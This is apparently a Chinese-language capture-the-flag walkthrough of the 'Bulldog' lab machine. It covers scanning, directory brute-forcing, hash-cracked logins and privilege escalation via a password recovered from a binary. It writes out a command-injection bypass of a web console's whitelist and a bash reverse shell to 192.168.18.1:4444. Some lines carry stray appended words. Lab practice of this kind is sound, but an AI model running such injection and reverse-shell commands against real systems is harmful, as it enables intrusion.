拿到靶場後先對ip進行掃描python
獲取ip 和端口web

針對項目路徑爆破shell
獲取兩個有用文件 django
http://192.168.18.144/dev/bash
dev,admin 框架
更具dev 發現他們用到框架和語言 找到一個 shell 鏈接tcp

http://192.168.18.144/dev/shell/ 網站
反健源碼 查看能夠看到spa

丟入md5 網站解密 成功的解密2個用戶3d
Back End: nick@bulldogindustries.com
用戶名:nick,密碼:bulldog (CMD5可免費解密出來)
Database: sarah@bulldogindustries.com
用戶名:sarah,密碼:bulldoglover (SOMD5可免費解密出來)
後臺登陸在訪問 shell 操做地址 發現能夠訪問 獲得一個命令控制檯
有白名單限制
這裏想到是 && 和 ||
嘗試執行

發現能夠 這時候直接反彈shell
ls &&echo "bash -i >& /dev/tcp/192.168.18.1/4444 0>&1" | bash
反彈成功 輸入python -c 'import pty;pty.spawn("/bin/bash")'
在對歷史操做記錄查看和文件配置後並未發現有用信息 卡了好久 去看了 wp 才發現 root 密碼要拆解
對 passwd 查出的用戶進行 home 文件尋找信息
find / -user bulldogadmin find / -user bulldogadmin django
(1) 發現值得關注的文件有:一個是note,一個是customPermissionApp。
/home/bulldogadmin/.hiddenadmindirectory/note
/home/bulldogadmin/.hiddenadmindirectory/customPermissionApp
(2) 打開note文本文件:發現提示webserver有時須要root權限訪問。
(3) 打開customPermissionApp,看上去是可執行文件,使用strings打印其中的可打印字符:
這裏獲得的字符太多了 又卡住了 查看其餘人寫的wp 發現
,英文單詞包括:SUPER、 ulitimate、PASSWORD、
youCANTget,這些都與最高權限帳號相關 去掉h
變成一句通順的英文句子:SUPERultimatePASSWORDyouCANTget
直接執行 su 切換root 用戶
django@bulldog:/home/django/bulldog$ sudo su -
sudo su -
[sudo] password for django: bulldog
Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
尬尷 雖然進去了 可是那個root 密碼拼接的是真想不出來